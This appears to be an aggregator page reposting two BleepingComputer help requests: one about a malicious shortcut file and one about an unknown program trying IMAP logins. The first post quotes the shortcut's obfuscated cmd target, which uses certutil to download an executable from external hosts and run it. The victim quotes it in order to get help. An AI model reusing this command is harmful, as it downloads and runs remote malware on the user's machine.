Featured Post

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputerPosted: 06 Jul 2020 11:33 AM PDT Hi all,Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage.. When I did double click it, I remember getting a standard windows dialog box. I believe it said the path did not exist or shortcut unavailable.. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder...  I ran scans with malwarebytes, Hitman with no results.The .lnk file target was:%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1The .lnk file 'start-in' was:"%APPDATA%\Mic…

Windows 10 - Something unknown accesses my IMAP Email - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Hi guys,

This is the first time I have submitted anything, so hope I am following the rules.

For at least 6 months, some unknown installed program is able to access my email server - I know it does because I watch the system firewall logs on the server's Cpanel. The bad program on my PC is trying to access my email via an IMAP login. Thankfully, I do not have an IMAP account - just POP. So - they have the wrong PW and it keeps getting rejected by the server. 

It happens within seconds of the PC being turned on.

It happens when my Thunderbird email is turned off. Somehow it doesn't need an email program to work.

It tries sporadically through the day - mostly about 20 times a day.

When I run a surveillance program like tcpview.exe  - it turns itself off so it does not access the server while the program to detect live programs is turned on. Same thing happens with TaskManager.

I have run Malwarebytes and TrendMicro free home Bitdefender - nothing is ever found.

I used to have an Edge browser but I deleted the toolbar link and it doesn't even show up anywhere that I can find - wonder if it was fake. I also used a browser called Vivaldi - it may have had issues.

So just now - I ran the FRST64 and it shows a lot of stuff which are attached .txt docs. When I post this note, I don't see the attachments on the post. Do I have to put them in this text? 

I am getting so worn out trying to find this hijacker thing. 

So, if anyone can see what would be causing this, thanks for helping.

Submitted by SweetCountry 

Edited by SweetCountry, Yesterday, 12:25 PM.



Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US